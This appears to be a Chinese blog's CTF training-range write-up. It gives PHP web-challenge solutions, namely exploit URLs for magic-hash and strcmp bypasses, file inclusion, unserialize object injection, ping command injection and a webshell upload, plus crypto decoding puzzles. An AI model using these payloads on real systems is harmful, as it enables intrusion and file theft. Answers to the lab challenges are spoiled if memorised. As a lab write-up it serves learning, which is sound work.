Lufer

  • 首页
  • 编程
  • 学习笔记
  • 日常折腾
Lufer
Code the World
  1. 首页
  2. 日常折腾
  3. 正文

20231211CTF训练靶场writeup

2023年12月14日 358点热度 0人点赞 0条评论

Web

1、php_weak_1

<!-- 
define('FLAG','flag{xxxxxx}');
if(@strcmp($_GET['flag'], FLAG) == 0 ){
	echo "success, flag:".FLAG;
}

通过GET获得flag字段和真实flag比较,使用数组绕过strcmp获得flag。

http://222.219.143.29:20031/?flag[]=0

2、php_weak_2

<!--
define('FLAG','flag{xxx}');
if($_GET['s1'] != $_GET['s2'] &&md5($_GET['s1']) == md5($_GET['s2']) ){
	echo "success flag:".FLAG;
}

比较S1与S2的md5值,通过md5漏洞绕过:

如:240610708,aabg7XSs,aabC9RqS,s878926199a这四段字符串MD5编码后结果分别对应

240610708:0E462097431906509019562988736854

aabg7XSs:0E087386482136013740957780965295

aabC9RqS:0E041022518165728065344349536299

s878926199a:0E545993274517709034328855841020

而在php代码中处理哈希字符串时,会把“0E”开头的哈希值都解析为0,比较时0=0为true绕过

同理使用sha1加密的值为)0E开头的字符串有如下:

aaroZmOk,aaK1STfy,aaO8zKZF,aa3OFF9m

http://222.219.143.29:20032/?s1=240610708&s2=aabg7XSs

3、lfi_demo

flag in /flag

GET parameter is 'file'

通过file字段包含flag文件

http://222.219.143.29:20021/?file=/flag

4、unser-demo

flag in flag.php

<p>flag in flag.php</p>
<?php
show_source(__FILE__);
class example{
        public $test;
        function __destruct(){
                echo show_source($this->test);
        }
}

$f = $_GET['f'];
unserialize($f);
?>

跟据提示,通过f字段传入example类进行反序列化,test值设置为flag.php

class example{
    public $test;
}

$a=new example();
$a->test="flag.php";
http://222.219.143.29:20040/?f=O:7:"example":1:{s:4:"test";s:8:"flag.php";}

5、exec_1

<?php
    $target = $_REQUEST[ 'ip' ];
    $target=trim($target);
    $substitutions = array(
        '&'  => '',
        ';' => '',
        '|' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        $cmd = shell_exec( 'ping  -c 1 ' . $target );
    }

    echo  "<pre>{$cmd}</pre>";
    highlight_file(__FILE__);     

?>

通过ip字段传入命令,因为分号和空格都被过滤,可以使用%0a或%0d代替分号,使用<或<>代替空格

http://222.219.143.29:20050/?ip=127.0.0.1%0als

发现存在flag.php

http://222.219.143.29:20050/?ip=127.0.0.1%0acat%3Cflag.php

在源码中获得flag值

6、unser_1


<!-- 
class just4fun {
    var $enter;
    var $secret;
}

if (isset($_GET['pass'])) {
    $pass = $_GET['pass'];

    if(get_magic_quotes_gpc()){
        $pass=stripslashes($pass);
    }

    $o = unserialize($pass);

    if ($o) {
        $o->secret = "*";
        if ($o->secret === $o->enter)
            echo "Congratulation! Here is my secret: ".$o->secret;
        else 
            echo "Oh no... You can't fool me";
    }
    else echo "are you trolling?";
}
-->

比较secret与enter的值,如果相同则输出,因为不清楚会给secret赋什么值,直接为enter赋secret的指针,使其保持相同。


class just4fun {
    var $enter;
    var $secret;
}
$a = new just4fun();
$a->enter=&$a->secret;
echo serialize($a);
http://222.219.143.29:20041/?pass=O:8:"just4fun":2:{s:5:"enter";N;s:6:"secret";R:2;}

7、php_weak_3

<?php
include 'flag.php';
show_source(__FILE__);
if(isset($_GET['a']) && isset($_POST['b']) && isset($_COOKIE['c'])){
    $v1 = $_GET['a'];
    $v2 = $_POST['b'];
    $v3 = $_COOKIE['c'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3,$flag))
            echo $flag;
    }
}
?>

a与b同样是md5比较,c是与flag用strcmp比较,使用数组绕过。

使用postman设置cookie,获取flag

8、unser_2

<?php  
@error_reporting(1); 
include 'flag.php';
class baby 
{   
    public $file;
    function __toString()      
    {          
        if(isset($this->file)) 
        {
            $filename = "./{$this->file}";        
            if (file_get_contents($filename))         
            {              
                return file_get_contents($filename); 
            } 
        }     
    }  
}  
if (isset($_GET['data']))  
{ 
    $data = $_GET['data'];
    preg_match('/[oc]:\d+:/i',$data,$matches);
    if(count($matches))
    {
        die('Hacker!');
    }
    else
    {
        $good = unserialize($data);
        echo $good;
    }     
} 
else 
{ 
    highlight_file("./index.php"); 
} 
?>

通过data传入baby类,输出file值,根据提示为file赋值为flag.php,因为存在正则表达式,会匹配掉开头的O:数字,因此在数字前添加加号绕过正则,需要进行urlencode。

http://222.219.143.29:20042/?data=O:%2B4:"baby":1:{s:4:"file";s:10:"./flag.php";}

9、lfi_2

点击页面可以看到页面链接存在文件包含

http://222.219.143.29:20023/?filename=include%2Ffile1.php&submit=%26%2325552%3B%26%2320132%3B

使用filter流测试

http://222.219.143.29:20023/?filename=php://filter/convert.base64-encode/resource=index.php&submit=%26%2325552%3B%26%2320132%3B

解码后获得提示,作为filename的值传入即可。

#flag:/tmp/flllllaag.txt

10、unser_3


you are not admin !  
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
 
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}
-->

首先需要让user通过文件读取得到the user is admin这个值,因此使用input流,发现存在include函数,直接通过file传参无法加载,通过filter流读取class.php源码

/?user=php://input&file=php://filter/convert.base64-encode/resource=class.php
<?php 

class Read{//f1a9.php

    public $file;

    public function __toString(){

        if(isset($this->file)){

            echo file_get_contents($this->file);

        }

        return "__toString was called!";

    }

}

?>

反序列化Read类,赋值file为f1a9.php获得flag

<?php 

class Read{//f1a9.php

    public $file;

    public function __toString(){

        if(isset($this->file)){

            echo file_get_contents($this->file);

        }

        return "__toString was called!";

    }

}

?>
/?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}

11、unser_4

还没做

12、up-lfi

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
</head>
<body>
<p>flag不在这</p>
    <!-- include.php -->
</body>
</html>

根据提示访问http://222.219.143.29:20022/include.php,获得新提示Tips: the parameter is file! :),同时通过源码得到提示,存在upload.php,包含进去之后获得一个文件上传按钮,上传一句话木马,通过蚁剑连接获得flag。

Crypto

1、贝斯

TVpXR0NaMzNHWTNUS04zREhCVERLTVpTTVJTVEVPQlNHWlNHQ05KWE1JWUdJTVpSTUlZVE9ZVENNRTJIMj09PQ==

base64后base32获得flag

2、一只小羊跳过了3个栅栏

密文:f{a5369d64lg7c8896e639f13652}a06ff04c8

三栏栅栏密码解码获得flag

3、Xor_1

加密公式:c = m ^ key 已知: c = "cidb~c4wvqZvq`<$$x" key = 5 求m = ?

异或即可

c="cidb~c4wvqZvq`<$$x"
res=""
for i in c:
    # print(i)
    res+=chr(ord(i) ^ 5)
print(res)

4、不仅仅是base

NzAgODUgODcgODYgODcgNzYgNzQgNzggNzAgODUgODcgODMgNTAgODAgODIgNzYgNzIgODIgNzkgODQgNTIgNzYgODIgNzYgNzAgNzcgODYgODMgODcgNzUgOTAgNzYgNzAgODkgODcgODMgNTAgNzYgNzQgNzggNzAgODUgODcgODMgNTAgNzYgNzQgNzggNzAgODUgODcgODMgNTIgNzUgOTAgNzYgNzAgNzcgODYgODMgODcgNzUgOTAgNzkgNzYgNzcgODcgODMgNTAgNzYgNzQgNzggNzAgODUgNTUgNjcgODcgODAgNjcgNTMgNzIgODkgODggNjcgODcgODcgOTAgNzYgNzAgNzcgNTUgNjcgNTAgNzYgNzQgNzggNzIgODIgNzkgODQgNTIgNzYgNzQgNzkgNzAgODYgNzggODMgNTAgNzYgNzQgNzggNzIgODkgODYgODQgODkgODggNzQgNTQgNzAgODUgODcgODMgNTAgNzYgODIgNzYgNzYgNzcgODcgODMgNTAgODAgODIgNzYgNzIgODIgNzkgODQgNTIgNzYgODIgNzYgNzAgNzcgODYgODMgNTIgNzYgNzQgNzggNzAgODUgODcgODYgODcgNzYgNzQgNTQgNzAgNzcgODYgODQgODkgODggNzQgNTQgNzAgODUgODggNjcgNTIgNzUgNTAgNTEgNzAgODUgODcgODQgNTIgNzUgOTAgNTIgNzYgODUgNTUgNjcgODcgNzYgODIgNzYgNzAgNzcgODggNjcgNTAgNzYgNzQgNzkgNzAgNzcgODYgODMgODcgNzUgOTAgNzkgNzAgODUgODcgODMgNTAgNzYgNzUgNTEgNzAgODUgNTUgNjcgODcgNzUgOTAgNTIgNzYgODUgNTUgNjcgNTAgNzYgODIgNzkgNzAgNzcgODYgODMgODcgODcgOTAgNzggNzIgODkgODYgODMgODcgNzUgOTAgNTIgNzYgODUgNTUgNjcgODcgNzYgODIgNzggNzYgNzcgODcgODMgNTAgNzYgNzQgNTQgNzAgNzcgNTQgNzAgNTAgODAgODIgNzggNzAgODUgODcgODMgNTIgNzYgODIgNzggNzYgNzcgODcgODMgNTAgODAgODIgNzYgNzIgODIgNzkgODQgNTIgNzYgNzQgNzkgNzAgNzggNzggODMgNTAgODAgODIgNzYgNzAgNzcgNTQgNzAgNTAgODAgODIgNzYgNzAgODkgODYgODYgODcgNzYgNzQgNzggNzIgODkgODYgODQgODkgODggNzQgNTQgNzAgODkgODcgODMgNTAgODcgOTAgNzggNzIgODkgODYgODMgODcgODAgNjcgNTMgNzIgODkgODggNzAgODcgNzYgNzQgNzggNzIgODkgODYgODQgODkgODggNzQgNTQgNzAgODkgODcgODMgNTIgNzYgNzUgNTEgNzAgODUgODcgODMgNTAgODAgODIgNzYgNzIgODIgNzkgODQgNTIgNzUgOTAgNzkgNzAgODUgODcgODMgNTAgNzYgNzQgNzggNzAgODkgODYgODYgODcgNzYgNzQgNzggNzIgODkgODYgODQgODkgODggNzQgNTQgNzAgNzcgODYgODMgODcgNzYgODIgNzggNzYgNzcgODcgODQgNTIgNzUgOTAgNzYgNzIgODIgNzkgODQgNTIgNzYgNzQgNzkgNzAgNzggNzggODMgNTAgNzYgNzQgNTQgNzAgNzcgNTQgNzAgNTAgODAgODIgNzYgNzAgNzcgODYgODMgODcgNzYgODIgNzggNzAgODkgODcgODMgNTAgNzYgNzQgNzggNzAgODUgODggNjcgNTAgNzYgODIgNzYgNzAgNzcgODYgODMgODcgNzYgODIgNzYgNzAgODkgODcgODMgNTAgNzYgNzQgNzggNzYgNzcgODcgODQgNTIgNzUgOTAgNzYgNzIgODIgNzkgODQgNTIgNzYgODIgNTQgNzAgODUgODcgODYgODcgNzYgNzQgNzggNzIgODkgODYgODMgODcgNzUgOTAgNTIgNzYgODUgNTUgNjcgNTIgNjEgNjEgNjE=

base64得到

70 85 87 86 87 76 74 78 70 85 87 83 50 80 82 76 72 82 79 84 52 76 82 76 70 77 86 83 87 75 90 76 70 89 87 83 50 76 74 78 70 85 87 83 50 76 74 78 70 85 87 83 52 75 90 76 70 77 86 83 87 75 90 79 76 77 87 83 50 76 74 78 70 85 55 67 87 80 67 53 72 89 88 67 87 87 90 76 70 77 55 67 50 76 74 78 72 82 79 84 52 76 74 79 70 86 78 83 50 76 74 78 72 89 86 84 89 88 74 54 70 85 87 83 50 76 82 76 76 77 87 83 50 80 82 76 72 82 79 84 52 76 82 76 70 77 86 83 52 76 74 78 70 85 87 86 87 76 74 54 70 77 86 84 89 88 74 54 70 85 88 67 52 75 50 51 70 85 87 84 52 75 90 52 76 85 55 67 87 76 82 76 70 77 88 67 50 76 74 79 70 77 86 83 87 75 90 79 70 85 87 83 50 76 75 51 70 85 55 67 87 75 90 52 76 85 55 67 50 76 82 79 70 77 86 83 87 87 90 78 72 89 86 83 87 75 90 52 76 85 55 67 87 76 82 78 76 77 87 83 50 76 74 54 70 77 54 70 50 80 82 78 70 85 87 83 52 76 82 78 76 77 87 83 50 80 82 76 72 82 79 84 52 76 74 79 70 78 78 83 50 80 82 76 70 77 54 70 50 80 82 76 70 89 86 86 87 76 74 78 72 89 86 84 89 88 74 54 70 89 87 83 50 87 90 78 72 89 86 83 87 80 67 53 72 89 88 70 87 76 74 78 72 89 86 84 89 88 74 54 70 89 87 83 52 76 75 51 70 85 87 83 50 80 82 76 72 82 79 84 52 75 90 79 70 85 87 83 50 76 74 78 70 89 86 86 87 76 74 78 72 89 86 84 89 88 74 54 70 77 86 83 87 76 82 78 76 77 87 84 52 75 90 76 72 82 79 84 52 76 74 79 70 78 78 83 50 76 74 54 70 77 54 70 50 80 82 76 70 77 86 83 87 76 82 78 70 89 87 83 50 76 74 78 70 85 88 67 50 76 82 76 70 77 86 83 87 76 82 76 70 89 87 83 50 76 74 78 76 77 87 84 52 75 90 76 72 82 79 84 52 76 82 54 70 85 87 86 87 76 74 78 72 89 86 83 87 75 90 52 76 85 55 67 52 61 61 61

10进制转字符

FUWVWLJNFUWS2PRLHROT4LRLFMVSWKZLFYWS2LJNFUWS2LJNFUWS4KZLFMVSWKZOLMWS2LJNFU7CWPC5HYXCWWZLFM7C2LJNHROT4LJOFVNS2LJNHYVTYXJ6FUWS2LRLLMWS2PRLHROT4LRLFMVS4LJNFUWVWLJ6FMVTYXJ6FUXC4K23FUWT4KZ4LU7CWLRLFMXC2LJOFMVSWKZOFUWS2LK3FU7CWKZ4LU7C2LROFMVSWWZNHYVSWKZ4LU7CWLRNLMWS2LJ6FM6F2PRNFUWS4LRNLMWS2PRLHROT4LJOFNNS2PRLFM6F2PRLFYVVWLJNHYVTYXJ6FYWS2WZNHYVSWPC5HYXFWLJNHYVTYXJ6FYWS4LK3FUWS2PRLHROT4KZOFUWS2LJNFYVVWLJNHYVTYXJ6FMVSWLRNLMWT4KZLHROT4LJOFNNS2LJ6FM6F2PRLFMVSWLRNFYWS2LJNFUXC2LRLFMVSWLRLFYWS2LJNLMWT4KZLHROT4LR6FUWVWLJNHYVSWKZ4LU7C4===

base32解码

--[----->+<]>.++++++.-----------.++++++.[----->+<]>.+[++>---<]>-.-[--->+<]>---.+[-->+<]>.+++.----[->++<]>-..+[-->+<]>+.++.--.++++.----[->++<]>-..+++[->+++<]>+.-[--->+<]>---..-[-->+<]>-.+[->++<]>+.+[-->+<]>.--[->++<]>.[-->+<]>.-.-[--->+<]>+.-----.+[-->+<]>+++.-[->++<]>-.+[-->+<]>++++.-.-----.-.++++.+.----[->++<]>.>--[-->+++<]>.

brainfuck解码获得flag

5、套娃

4c4245474f36534e4e5234444954544b4a4a52574b52434e47464d45515a5a534a565748514e434e504a4647475a4b454c45594651534448504a4757593642554a5a56464559334649524758535743494d345a453452545947524758555354444d564346534d43594a42545855544c4d50413245343253534d4e535549544c5a4c4245474f4d534f495a344449544c324a4a52574b52435a47424d45515a33324a565748514e434f4e4a4a47475a4b454a56345651534448474a48454d3642554a5635453459334649524d54435743494d3535453233445947524847555354444d56434532364b594a42545445544c4d504132453236534f4d4e535549574c324c4245474f36534f4b5a34444954544b4b4a52574b52434e504a4d45515a5a534a5a4c48514e434e504a4647475a4b454c46345651534448504a4757593642554a5a56464d59334649524758535743494d345a453233445947524758555354444d56434653364b594a42545855544c4d504132453432534b4d4e535549544c5a4c4245474f4d534e4e52344449544c324a4a52574b52435a50464d45515a33324a565748514e434f4e4a4647475a4b454a56345651534448474a48464d3642554a5635455559334649524d58535743494d3535453456545947524847555354444d56434532364b594a42545445545347504132453236534f4d4e535549574a524c4245474f36534e4e5234444954544b4a4a52574b52434e50464d45515a5a534a565748514e434e504a4647475a4b454c46345651534448504a4754433642554a5a56453459334649524754435743494d345a453452545947524758555454444d564346534d4b594a42545855544c4d50413245343253574d4e535549544c5a4c4245474f4d534e4e52344449544c324a4a52574b52435a50464d45515a33324a565748514e434f4e4a4647475a4b454a56345651534448474a4757593642554a5635455559334649524d58535743494d3535453233445947524847555354444d56434532364b594a42545445545357504132453236534b4d4e535549574c5a4c4245474f36534e4e5234444954544b4a4a52574b52434e50464d45515a5a534a565748514e434e504a4647475a4b454c46345651534448504a4757593642554a5a56455559334649524758535743494d345a453233445947524758555354444d56434653364b594a42545855544c4d50413245343253574d4e535549544c324c4245474f4d534f4b5a344449544c324a4a52574b52435a47424d45515a33324a5a4c48514e434f4e4a4647475a4b454a56345651534448474a48454d3642554a5635455559334649524d54415743494d3535453233445947524847555554444d56434532364b594a42545445545347504132453236534b4d4e535549574a514c4245474f36534e474634444954544b4b5a52574b52434e50464d45515a5a534a565748514e434e504a4847475a4b454c46354651534448504a48464d3642554a5a56464559334649524758555743494d345a453456545947524758555354444d564346534d4b594a42545855544c4d504132453432534b4d4e535549544c5a4c4245474f4d534e4e52344449544c324a4a52574b52435a47464d45515a33324a565748514e434f4e4a4a47475a4b454a56345651534448474a48454d3642554a5635455559334649524d54415743494d3535453233445947524847555554444d56434532364b594a42545445545347504132453236534b4d4e535549574a524c4245474f36534e4e5234444954544b4a4a52574b52434e50464d45515a5a534a565748514e434e504a4647475a4b454c46345651534448504a4757593642554a5a56455559334649524758535743494d345a453233445947524758555354444d56434653364b594a42545855544c4d504132453432534b4d4e535549544c5a4c4245474f4d534f4b5a344449544c324a4a52574b52435a47424d45515a33324a565748514e434f4e4a4a47475a4b454a56345651534448474a48464d3642554a5635455559334649524d58535743494d3535453233445947524847555654444d56434532364b594a42545445545347504132453236534b4d4e535549574a514c4245474f36534e4e5234444954544b4b4a52574b52434e50464d45515a5a534a5a4448514e434e504a4647475a4b454c45594651534448504a4757593642554a5a56464559334649524758535743494d345a453456545947524758555354444d56434653364b594a42545855544c4d504132453432534b4d4e535549544c5a4c4245474f4d534e4e52344449544c324a4a52574b52435a50464d45515a33324a565748514e434f4e4a4647475a4b454a56345651534448474a4757593642554a5635455559334649524d58535743494d3535453233445947524847555354444d56434532364b594a42545445545357504132453236534b4d4e535549574c5a4c4245474f36534e4e5234444954544b4b5a52574b52434e50464d45515a5a534a5a4c48514e434e504a4647475a4b454c45594651534448504a4757593642554a5a56464559334649524758535743494d345a453452545947524758555354444d564346534d43594a42545855544c4d50413245343253574d4e535549544c5a4c4245474f4d534f495a344449544c324a4a52574b52435a47424d45515a33324a565748514e434f4e4a4c47475a4b454a56345651534448474a4757593642554a5635455559334649524d58535743494d3535453233445947524847555354444d56434532364b594a42545445544c4d50413245323653574d4e535549574c5a4c4245474f36534e4e5234444954544b4b4a52574b52434e504a4d45515a5a534a5a4c48514e434e504a4647475a4b454c46345651534448504a4757593642554a5a56455559334649524758555743494d345a45324d4c5947524758555654444d564346534d43594a42545855544a5250413245343253574d4e535549544c5a4c4245474f4d534f4b5a344449544c324b5a52574b52435a50464d45515a33324a565748514e434f4e4a4a47475a4b454a56345651534448474a48454d3642554a5635453459334649524d54435743494d3535453233445947524847555354444d564345323653594a42545445544a5250413245323653574d4e535549574a514c4245474f36534e474634444954544b4b5a52574b52434e50464d45515a5a534a5a4c48514e434e504a4647475a4b454c45594651534448504a4757593642554a5a56464d59334649524758535743494d345a453452545947524758555354444d564346534d43594a42545855544c4d50413245343253534d4e535549544c5a4c4245474f4d534f495a344449544c324a4a52574b52435a47424d45515a33324a565748514e434f4e4a4c47475a4b454a56345651534448474a48454d3642554a5635464d59334649524d58535743494d3535453233445947524847555554444d56434532364b594a42545445545347504132453236534b4d4e535549574a514c4245474f36534e4e5234444954544b4b4a52574b52434e50464d45515a5a534a5a4448514e434e504a4847475a4b454c45595651534448504a4757593642554a5a56455559334649524758555743494d345a45324d4c5947524758555654444d564346534d43594a42545855544a5250413245343253574d4e535549544c5a4c4245474f4d534f495a344449544c324a4a52574b52435a47424d45515a33324a565748514e434f4e4a4c47475a4b454a55595651534448474a4757593642554a5635455559334649524d54415743494d3535453233445947524847555554444d564345323653594a42545445545357504132453236534b4d4e535549574c5a4c4245474f36534e474634444954544b4a5a52574b52434e47464d45515a5a534a5a4448514e434e504a4847475a4b454c45595651534448504a4757593642554a5a56455559334649524758535743494d345a453456545947524758555354444d56434653364b594a42545855544c4d50413245343253574d4e535549544a524c4245474f4d534e4e52344449544c324a4a52574b52435a47424d45515a33324a555958514e434f4e4a4c47475a4b454a56345651534448474a4757593642554a5635455559334649524d58535743494d353545324d4c5947524847555454444d564345324d4b594a42545445545347504132453236534f4d4e535549574a524c4245474f36534e4e5234444954544b4b5a52574b52434e47464d45515a5a534a565748514e434e504a4647475a4b454c45594651534448504a4757593642554a5a56464559334649524758555743494d345a453456545947524758555354444d56434653364b594a42545855544a52504132453432534f4d4e535549544a524c4245474f4d534f495a344449544c324a5a52574b52435a47464d45515a33324a565748514e434f4e4a4c47475a4b454a56345651534448474a48454d3642554a5635455559334649524d54415743494d3535453233445947524847555554444d56434532364b594a42545445545357504132453236534b4d4e535549574a514c4245474f36534e4e5234444954544b4b5a52574b52434e50464d45515a5a534a5a4448514e434e504a4647475a4b454c45594651534448504a4757593642554a5a56464d59334649524758535743494d345a453233445947524758555354444d56434653364b594a42545855544c4d504132453432534b4d4e535549544c5a4c4245474f4d534e4e52344449544c324b5a52574b52435a50464d45515a33324a565748514e434f4e4a4a47475a4b454a56354651534448474a48464d3642554a5635455559334649524d58535743494d3535453233445947524847555354444d564345323653594a42545445544a5250413245323653574d4e535549574a514c4245474f36534e474634444954544b4b5a52574b52434e50464d45515a5a534a565748514e434e504a4647475a4b454c45595651534448504a4757593642554a5a56464559334649524754435743494d345a453233445947524758555354444d564346534d43594a42545855544c4d50413245343253534d4e535549544c324c4245474f4d534f4b5a344449544c324a4a52574b52435a50464d45515a33324a555958514e434f4e4a4847475a4b454a55595651534448474a48454d3642554a5635453459334649524d54435743494d3535453233445947524847555554444d56434532364b594a42545445545357504132453236534b4d4e535549574c5a4c4245474f36534e4e5234444954544b4a4a52574b52434e50464d45515a5a534a565748514e434e504a4647475a4b454c45595651534448504a4757593642554a5a56464559334649524758535743494d345a453452545947524758555354444d564346534d43594a42545855544c4d50413245343253534d4e535549544c5a4c4245474f4d534f495a344449544c324a4a52574b52435a47424d45515a33324a565748514e434f4e4a4a47475a4b454a56345651534448474a48454d3642554a5635455559334649524d54415743494d3535453233445947524847555654444d56434532364b594a4254544554535750413245323653574d4e535549574c5a4c4245474f36534e4e5234444954544b4b4a52574b52434e50464d45515a5a534a5a4448514e434e504a4647475a4b454c45594651534448504a4757593642554a5a56464559334649524758535743494d345a453452545947524758555454444d564346534d4b594a42545855544c4d504132453432534b4d4e535549544c324c4245474f4d534e4746344449544c324b5a52574b52435a47424d45515a33324a555958514e434f4e4a4c47475a4b454a56345651534448474a48454d3642554a5635455559334649524d54415743494d3535453233445947524847555654444d564345324d4b594a42545445544c4d504132453236534b4d4e535549574a514c4245474f36534e4e5234444954544b4b4a52574b52434e504a4d45515a5a534a5a4c48514e434e504a4647475a4b454c46345651534448504a4754433642554a5a56453459334649524754435743494d345a453452545947524758555454444d564346534d4b594a42545855544c4d50413245343253534d4e535549544c5a4c4245474f4d534f495a344449544c324a4a52574b52435a47424d45515a33324a565748514e434f4e4a4c47475a4b454a56345651534448474a48454d3642554a5635455559334649524d54435743494d353545324d4c5947524847555654444d56434532364b594a42545445545347504132453236534b4d4e535549574a514c4245474f36534f4b5a34444954544b4a4a52574b52434e50464d45515a5a534a5a4448514e434e504a4647475a4b454c45594651534448504a4754433642554a5a56464d59334649524758535743494d345a453233445947524758555354444d56434653364b594a42545855544c4d504132453432534b4d4e535549544c324c4245474f4d534e4746344449544c324b5a52574b52435a47424d45515a33324a555958514e434f4e4a4c47475a4b454a56345651534448474a484643504a35

字符两两分隔后16进制转asscii

LBEGO6SNNR4DITTKJJRWKRCNGFMEQZZSJVWHQNCNPJFGGZKELEYFQSDHPJGWY6BUJZVFEY3FIRGXSWCIM4ZE4RTYGRGXUSTDMVCFSMCYJBTXUTLMPA2E42SSMNSUITLZLBEGOMSOIZ4DITL2JJRWKRCZGBMEQZ32JVWHQNCONJJGGZKEJV4VQSDHGJHEM6BUJV5E4Y3FIRMTCWCIM55E23DYGRHGUSTDMVCE26KYJBTTETLMPA2E26SOMNSUIWL2LBEGO6SOKZ4DITTKKJRWKRCNPJMEQZZSJZLHQNCNPJFGGZKELF4VQSDHPJGWY6BUJZVFMY3FIRGXSWCIM4ZE23DYGRGXUSTDMVCFS6KYJBTXUTLMPA2E42SKMNSUITLZLBEGOMSNNR4DITL2JJRWKRCZPFMEQZ32JVWHQNCONJFGGZKEJV4VQSDHGJHFM6BUJV5EUY3FIRMXSWCIM55E4VTYGRHGUSTDMVCE26KYJBTTETSGPA2E26SOMNSUIWJRLBEGO6SNNR4DITTKJJRWKRCNPFMEQZZSJVWHQNCNPJFGGZKELF4VQSDHPJGTC6BUJZVE4Y3FIRGTCWCIM4ZE4RTYGRGXUTTDMVCFSMKYJBTXUTLMPA2E42SWMNSUITLZLBEGOMSNNR4DITL2JJRWKRCZPFMEQZ32JVWHQNCONJFGGZKEJV4VQSDHGJGWY6BUJV5EUY3FIRMXSWCIM55E23DYGRHGUSTDMVCE26KYJBTTETSWPA2E26SKMNSUIWLZLBEGO6SNNR4DITTKJJRWKRCNPFMEQZZSJVWHQNCNPJFGGZKELF4VQSDHPJGWY6BUJZVEUY3FIRGXSWCIM4ZE23DYGRGXUSTDMVCFS6KYJBTXUTLMPA2E42SWMNSUITL2LBEGOMSOKZ4DITL2JJRWKRCZGBMEQZ32JZLHQNCONJFGGZKEJV4VQSDHGJHEM6BUJV5EUY3FIRMTAWCIM55E23DYGRHGUUTDMVCE26KYJBTTETSGPA2E26SKMNSUIWJQLBEGO6SNGF4DITTKKZRWKRCNPFMEQZZSJVWHQNCNPJHGGZKELF5FQSDHPJHFM6BUJZVFEY3FIRGXUWCIM4ZE4VTYGRGXUSTDMVCFSMKYJBTXUTLMPA2E42SKMNSUITLZLBEGOMSNNR4DITL2JJRWKRCZGFMEQZ32JVWHQNCONJJGGZKEJV4VQSDHGJHEM6BUJV5EUY3FIRMTAWCIM55E23DYGRHGUUTDMVCE26KYJBTTETSGPA2E26SKMNSUIWJRLBEGO6SNNR4DITTKJJRWKRCNPFMEQZZSJVWHQNCNPJFGGZKELF4VQSDHPJGWY6BUJZVEUY3FIRGXSWCIM4ZE23DYGRGXUSTDMVCFS6KYJBTXUTLMPA2E42SKMNSUITLZLBEGOMSOKZ4DITL2JJRWKRCZGBMEQZ32JVWHQNCONJJGGZKEJV4VQSDHGJHFM6BUJV5EUY3FIRMXSWCIM55E23DYGRHGUVTDMVCE26KYJBTTETSGPA2E26SKMNSUIWJQLBEGO6SNNR4DITTKKJRWKRCNPFMEQZZSJZDHQNCNPJFGGZKELEYFQSDHPJGWY6BUJZVFEY3FIRGXSWCIM4ZE4VTYGRGXUSTDMVCFS6KYJBTXUTLMPA2E42SKMNSUITLZLBEGOMSNNR4DITL2JJRWKRCZPFMEQZ32JVWHQNCONJFGGZKEJV4VQSDHGJGWY6BUJV5EUY3FIRMXSWCIM55E23DYGRHGUSTDMVCE26KYJBTTETSWPA2E26SKMNSUIWLZLBEGO6SNNR4DITTKKZRWKRCNPFMEQZZSJZLHQNCNPJFGGZKELEYFQSDHPJGWY6BUJZVFEY3FIRGXSWCIM4ZE4RTYGRGXUSTDMVCFSMCYJBTXUTLMPA2E42SWMNSUITLZLBEGOMSOIZ4DITL2JJRWKRCZGBMEQZ32JVWHQNCONJLGGZKEJV4VQSDHGJGWY6BUJV5EUY3FIRMXSWCIM55E23DYGRHGUSTDMVCE26KYJBTTETLMPA2E26SWMNSUIWLZLBEGO6SNNR4DITTKKJRWKRCNPJMEQZZSJZLHQNCNPJFGGZKELF4VQSDHPJGWY6BUJZVEUY3FIRGXUWCIM4ZE2MLYGRGXUVTDMVCFSMCYJBTXUTJRPA2E42SWMNSUITLZLBEGOMSOKZ4DITL2KZRWKRCZPFMEQZ32JVWHQNCONJJGGZKEJV4VQSDHGJHEM6BUJV5E4Y3FIRMTCWCIM55E23DYGRHGUSTDMVCE26SYJBTTETJRPA2E26SWMNSUIWJQLBEGO6SNGF4DITTKKZRWKRCNPFMEQZZSJZLHQNCNPJFGGZKELEYFQSDHPJGWY6BUJZVFMY3FIRGXSWCIM4ZE4RTYGRGXUSTDMVCFSMCYJBTXUTLMPA2E42SSMNSUITLZLBEGOMSOIZ4DITL2JJRWKRCZGBMEQZ32JVWHQNCONJLGGZKEJV4VQSDHGJHEM6BUJV5FMY3FIRMXSWCIM55E23DYGRHGUUTDMVCE26KYJBTTETSGPA2E26SKMNSUIWJQLBEGO6SNNR4DITTKKJRWKRCNPFMEQZZSJZDHQNCNPJHGGZKELEYVQSDHPJGWY6BUJZVEUY3FIRGXUWCIM4ZE2MLYGRGXUVTDMVCFSMCYJBTXUTJRPA2E42SWMNSUITLZLBEGOMSOIZ4DITL2JJRWKRCZGBMEQZ32JVWHQNCONJLGGZKEJUYVQSDHGJGWY6BUJV5EUY3FIRMTAWCIM55E23DYGRHGUUTDMVCE26SYJBTTETSWPA2E26SKMNSUIWLZLBEGO6SNGF4DITTKJZRWKRCNGFMEQZZSJZDHQNCNPJHGGZKELEYVQSDHPJGWY6BUJZVEUY3FIRGXSWCIM4ZE4VTYGRGXUSTDMVCFS6KYJBTXUTLMPA2E42SWMNSUITJRLBEGOMSNNR4DITL2JJRWKRCZGBMEQZ32JUYXQNCONJLGGZKEJV4VQSDHGJGWY6BUJV5EUY3FIRMXSWCIM55E2MLYGRHGUTTDMVCE2MKYJBTTETSGPA2E26SOMNSUIWJRLBEGO6SNNR4DITTKKZRWKRCNGFMEQZZSJVWHQNCNPJFGGZKELEYFQSDHPJGWY6BUJZVFEY3FIRGXUWCIM4ZE4VTYGRGXUSTDMVCFS6KYJBTXUTJRPA2E42SOMNSUITJRLBEGOMSOIZ4DITL2JZRWKRCZGFMEQZ32JVWHQNCONJLGGZKEJV4VQSDHGJHEM6BUJV5EUY3FIRMTAWCIM55E23DYGRHGUUTDMVCE26KYJ